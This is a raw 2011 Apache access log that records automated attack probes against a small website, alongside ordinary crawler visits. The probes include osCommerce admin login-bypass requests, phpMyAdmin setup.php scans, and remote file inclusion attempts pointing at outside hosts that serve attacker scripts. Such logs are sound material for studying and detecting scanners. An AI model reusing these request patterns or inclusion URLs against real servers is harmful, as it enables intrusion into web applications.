61.135.249.104 - - [14/Sep/2011:18:55:24 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )"
213.198.35.81 - - [14/Sep/2011:18:59:07 +0000] "GET /Account/access_log.txt/admin/banner_manager.php/login.php HTTP/1.1" 404 372 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
213.198.35.81 - - [14/Sep/2011:18:59:07 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
213.198.35.81 - - [14/Sep/2011:18:59:08 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
213.198.35.81 - - [14/Sep/2011:18:59:09 +0000] "GET /Account/access_log.txt/admin/categories.php/login.php HTTP/1.1" 404 368 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
213.198.35.81 - - [14/Sep/2011:18:59:09 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
213.198.35.81 - - [14/Sep/2011:18:59:09 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
213.198.35.81 - - [14/Sep/2011:18:59:13 +0000] "GET /Account/access_log.txt/admin/file_manager.php/login.php HTTP/1.1" 404 370 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
213.198.35.81 - - [14/Sep/2011:18:59:13 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
213.198.35.81 - - [14/Sep/2011:18:59:14 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
207.218.231.66 - - [14/Sep/2011:20:18:23 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.831"
207.218.231.66 - - [14/Sep/2011:20:18:24 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.831"
67.195.115.166 - - [14/Sep/2011:20:31:37 +0000] "GET /Account/?C=M;O=A HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
91.199.151.27 - - [14/Sep/2011:20:33:28 +0000] "GET /Account//appserv/main.php?appserv_root=test?? HTTP/1.1" 404 340 "-" "Avant Browser (http://www.avantbrowser.com)"
91.199.151.27 - - [14/Sep/2011:20:33:29 +0000] "GET /Account//appserv/main.php?appserv_root=http://joyoftraining.com/.dir/sp.txt?? HTTP/1.1" 404 340 "-" "Avant Browser (http://www.avantbrowser.com)"
91.199.151.27 - - [14/Sep/2011:20:33:30 +0000] "GET /Account//appserv/main.php?appserv_root=http://joyoftraining.com/.dir/sp.txt?? HTTP/1.1" 404 340 "-" "Avant Browser (http://www.avantbrowser.com)"
91.199.151.27 - - [14/Sep/2011:20:33:31 +0000] "GET //appserv/main.php?appserv_root=test?? HTTP/1.1" 404 331 "-" "Avant Browser (http://www.avantbrowser.com)"
91.199.151.27 - - [14/Sep/2011:20:33:32 +0000] "GET //appserv/main.php?appserv_root=http://joyoftraining.com/.dir/sp.txt?? HTTP/1.1" 404 331 "-" "Avant Browser (http://www.avantbrowser.com)"
91.199.151.27 - - [14/Sep/2011:20:33:33 +0000] "GET //appserv/main.php?appserv_root=http://joyoftraining.com/.dir/sp.txt?? HTTP/1.1" 404 331 "-" "Avant Browser (http://www.avantbrowser.com)"
94.247.27.29 - - [14/Sep/2011:21:06:53 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.825"
94.247.27.29 - - [14/Sep/2011:21:06:54 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.825"
91.121.28.191 - - [14/Sep/2011:21:07:55 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [14/Sep/2011:21:07:55 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [14/Sep/2011:21:07:57 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [14/Sep/2011:21:07:57 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
95.108.240.251 - - [14/Sep/2011:21:11:09 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
61.135.249.103 - - [14/Sep/2011:21:39:48 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )"
207.218.231.66 - - [14/Sep/2011:21:52:11 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.831"
207.218.231.66 - - [14/Sep/2011:21:52:11 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.831"
91.121.28.191 - - [14/Sep/2011:21:53:29 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [14/Sep/2011:21:53:29 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [14/Sep/2011:21:53:30 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [14/Sep/2011:21:53:30 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
207.218.231.66 - - [14/Sep/2011:22:55:01 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.831"
207.218.231.66 - - [14/Sep/2011:22:55:01 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.831"
91.121.28.191 - - [14/Sep/2011:22:55:38 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [14/Sep/2011:22:55:38 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [14/Sep/2011:22:55:40 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [14/Sep/2011:22:55:40 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
207.218.231.66 - - [14/Sep/2011:23:00:04 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.831"
207.218.231.66 - - [14/Sep/2011:23:00:04 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.831"
207.218.231.66 - - [14/Sep/2011:23:06:48 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.831"
207.218.231.66 - - [14/Sep/2011:23:06:48 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.831"
67.195.115.166 - - [14/Sep/2011:23:20:52 +0000] "GET / HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
210.93.117.43 - - [15/Sep/2011:00:05:54 +0000] "GET //include/admin.lib.inc.php?site_path=http://allstarchallenger.com/images/f1??? HTTP/1.1" 404 340 "-" "Mozilla/5.0"
210.93.117.43 - - [15/Sep/2011:00:05:54 +0000] "GET /Account//include/admin.lib.inc.php?site_path=http://allstarchallenger.com/images/f1??? HTTP/1.1" 404 349 "-" "Mozilla/5.0"
210.93.117.43 - - [15/Sep/2011:00:05:54 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','13','8','%22include%2Flib.inc.php%22','',%20'00fc37354ae397170c2b84e21c1c9cf4c748a45fec0842c2d289',%200)//include/admin.lib.inc.php?site_path=http://allstarchallenger.com/images/f1??? HTTP/1.1" 404 559 "-" "Mozilla/5.0"
207.218.231.66 - - [15/Sep/2011:00:10:00 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.831"
207.218.231.66 - - [15/Sep/2011:00:10:00 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.831"
91.121.28.191 - - [15/Sep/2011:00:10:23 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:00:10:23 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:00:10:31 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:00:10:31 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
61.135.249.47 - - [15/Sep/2011:00:21:17 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )"
123.125.71.87 - - [15/Sep/2011:00:42:35 +0000] "GET /Account/access_log.txt HTTP/1.1" 200 408410 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
184.106.205.36 - - [15/Sep/2011:01:07:21 +0000] "GET /muieblackcat HTTP/1.1" 404 327 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:28 +0000] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 340 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:28 +0000] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 340 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:28 +0000] "GET //mysql/scripts/setup.php HTTP/1.1" 404 338 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:28 +0000] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 343 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:28 +0000] "GET //phpadmin/scripts/setup.php HTTP/1.1" 404 341 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:32 +0000] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 343 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:32 +0000] "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 404 344 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:35 +0000] "GET //pma/scripts/setup.php HTTP/1.1" 404 336 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:35 +0000] "GET //databaseadmin/scripts/setup.php HTTP/1.1" 404 346 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:35 +0000] "GET //admm/scripts/setup.php HTTP/1.1" 404 337 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:35 +0000] "GET //admn/scripts/setup.php HTTP/1.1" 404 337 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:38 +0000] "GET //phpMyA/scripts/setup.php HTTP/1.1" 404 339 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:38 +0000] "GET //phpmya/scripts/setup.php HTTP/1.1" 404 339 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:38 +0000] "GET //#phpmyadmin_2.9.11/ HTTP/1.1" 200 749 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:41 +0000] "GET //mysql2/scripts/setup.php HTTP/1.1" 404 339 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:41 +0000] "GET //phpmyadm/scripts/setup.php HTTP/1.1" 404 341 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:41 +0000] "GET //php1/scripts/setup.php HTTP/1.1" 404 337 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:41 +0000] "GET //php2/scripts/setup.php HTTP/1.1" 404 337 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:41 +0000] "GET //sqladm.old/scripts/setup.php HTTP/1.1" 404 343 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:44 +0000] "GET //myAdmin/scripts/setup.php HTTP/1.1" 404 340 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:45 +0000] "GET //pmabd/scripts/setup.php HTTP/1.1" 404 338 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:45 +0000] "GET //mydb/scripts/setup.php HTTP/1.1" 404 337 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:45 +0000] "GET //mysql_administrator/scripts/setup.php HTTP/1.1" 404 352 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:45 +0000] "GET //pma_mydb/scripts/setup.php HTTP/1.1" 404 341 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:45 +0000] "GET //webmail2/scripts/setup.php HTTP/1.1" 404 341 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:45 +0000] "GET //myphp/scripts/setup.php HTTP/1.1" 404 338 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:48 +0000] "GET //phpas/scripts/setup.php HTTP/1.1" 404 338 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:51 +0000] "GET //./scripts/setup.php HTTP/1.1" 404 332 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:51 +0000] "GET //_db/scripts/setup.php HTTP/1.1" 404 336 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:51 +0000] "GET //_dbadmin/scripts/setup.php HTTP/1.1" 404 341 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:51 +0000] "GET //_phpadmin/scripts/setup.php HTTP/1.1" 404 342 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:54 +0000] "GET //_phpmyadmin/scripts/setup.php HTTP/1.1" 404 344 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:54 +0000] "GET //_phpMyAdmin/scripts/setup.php HTTP/1.1" 404 344 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:54 +0000] "GET //_myphp/scripts/setup.php HTTP/1.1" 404 339 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:54 +0000] "GET //_php/scripts/setup.php HTTP/1.1" 404 337 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:54 +0000] "GET //sql/scripts/setup.php HTTP/1.1" 404 336 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:55 +0000] "GET //_sql/scripts/setup.php HTTP/1.1" 404 337 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:55 +0000] "GET //my-php/scripts/setup.php HTTP/1.1" 404 339 "-" "-"
184.106.205.36 - - [15/Sep/2011:01:07:55 +0000] "GET //My-php/scripts/setup.php HTTP/1.1" 404 339 "-" "-"
123.125.71.46 - - [15/Sep/2011:01:25:38 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
67.195.115.166 - - [15/Sep/2011:01:39:58 +0000] "GET /?C=M;O=A HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.28.191 - - [15/Sep/2011:01:59:47 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:01:59:47 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:01:59:47 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:01:59:48 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
207.218.231.66 - - [15/Sep/2011:02:19:07 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.831"
207.218.231.66 - - [15/Sep/2011:02:19:07 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.831"
91.121.28.191 - - [15/Sep/2011:02:19:21 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:02:19:21 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:02:19:24 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:02:19:24 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
211.241.24.100 - - [15/Sep/2011:02:52:25 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','17','2','index.php%3FcPath%3D20+sklep++%22osCid%3D%22++nl+','',%20'00a8f11d8e79de2ced575331209503f89b1500f3195c870e19c8',%200)/admin/banner_manager.php/login.php HTTP/1.1" 404 585 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
211.241.24.100 - - [15/Sep/2011:02:52:25 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','17','2','index.php%3FcPath%3D20+sklep++%22osCid%3D%22++nl+','',%20'0099b25e4d79de2ced575331209503f89b1500f3196dc44dd2f7',%200)/admin/categories.php/login.php HTTP/1.1" 404 581 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
211.241.24.100 - - [15/Sep/2011:02:52:26 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
211.241.24.100 - - [15/Sep/2011:02:52:27 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
211.241.24.100 - - [15/Sep/2011:02:52:28 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
211.241.24.100 - - [15/Sep/2011:02:52:30 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','17','2','index.php%3FcPath%3D20+sklep++%22osCid%3D%22++nl+','',%20'00933f283e79de2ced575331209503f89b1500f31967493b9b71',%200)/admin/file_manager.php/login.php HTTP/1.1" 404 583 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
211.241.24.100 - - [15/Sep/2011:02:52:30 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
211.241.24.100 - - [15/Sep/2011:02:52:31 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
211.241.24.100 - - [15/Sep/2011:02:52:32 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
91.121.28.191 - - [15/Sep/2011:02:53:51 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:02:53:52 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:02:53:54 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:02:53:54 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:03:00:57 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:03:00:57 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:03:00:57 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:03:00:57 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
61.135.249.145 - - [15/Sep/2011:03:08:38 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )"
67.195.115.166 - - [15/Sep/2011:03:33:43 +0000] "GET /Account/ HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [15/Sep/2011:04:02:06 +0000] "GET /?C=N;O=A HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
77.79.245.90 - - [15/Sep/2011:04:03:32 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','50','8','%2A.php%3FcPath%3D15++hu','',%20'00c708731061ea3ba479fc1d7346fa8658a1d7884b337e73cf62',%200)/admin/file_manager.php/login.php HTTP/1.1" 404 552 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.79.245.90 - - [15/Sep/2011:04:03:32 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','50','8','%2A.php%3FcPath%3D15++hu','',%20'0085f45b5461ea3ba479fc1d7346fa8658a1d7884b71825b8c6b',%200)/admin/banner_manager.php/login.php HTTP/1.1" 404 554 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.79.245.90 - - [15/Sep/2011:04:03:33 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.79.245.90 - - [15/Sep/2011:04:03:33 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.79.245.90 - - [15/Sep/2011:04:03:33 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.79.245.90 - - [15/Sep/2011:04:03:33 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.79.245.90 - - [15/Sep/2011:04:03:35 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','50','8','%2A.php%3FcPath%3D15++hu','',%20'00a14cc8ad61ea3ba479fc1d7346fa8658a1d7884b553ac872eb',%200)/admin/categories.php/login.php HTTP/1.1" 404 550 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.79.245.90 - - [15/Sep/2011:04:03:36 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.79.245.90 - - [15/Sep/2011:04:03:36 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.201.153.36 - - [15/Sep/2011:04:04:19 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','50','8','%2A.php%3FcPath%3D15++hu','',%20'0087b4625861ea3ba479fc1d7346fa8658a1d7884b73c263a336',%200)/admin/file_manager.php/login.php HTTP/1.1" 404 552 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
91.201.153.36 - - [15/Sep/2011:04:04:19 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','50','8','%2A.php%3FcPath%3D15++hu','',%20'00a06d394661ea3ba479fc1d7346fa8658a1d7884b541b38bd8e',%200)/admin/categories.php/login.php HTTP/1.1" 404 550 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
91.201.153.36 - - [15/Sep/2011:04:04:19 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','50','8','%2A.php%3FcPath%3D15++hu','',%20'00b0e9dea961ea3ba479fc1d7346fa8658a1d7884b449fdf522b',%200)/admin/banner_manager.php/login.php HTTP/1.1" 404 554 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
91.201.153.36 - - [15/Sep/2011:04:04:20 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
91.201.153.36 - - [15/Sep/2011:04:04:20 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
91.201.153.36 - - [15/Sep/2011:04:04:20 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
91.201.153.36 - - [15/Sep/2011:04:04:20 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
91.201.153.36 - - [15/Sep/2011:04:04:20 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
91.201.153.36 - - [15/Sep/2011:04:04:20 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
91.121.28.191 - - [15/Sep/2011:04:08:44 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:04:08:44 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:04:08:54 +0000] "GET /Account//admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 354 "-" "libwww-perl/5.803"
91.121.28.191 - - [15/Sep/2011:04:08:54 +0000] "GET //admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "libwww-perl/5.803"
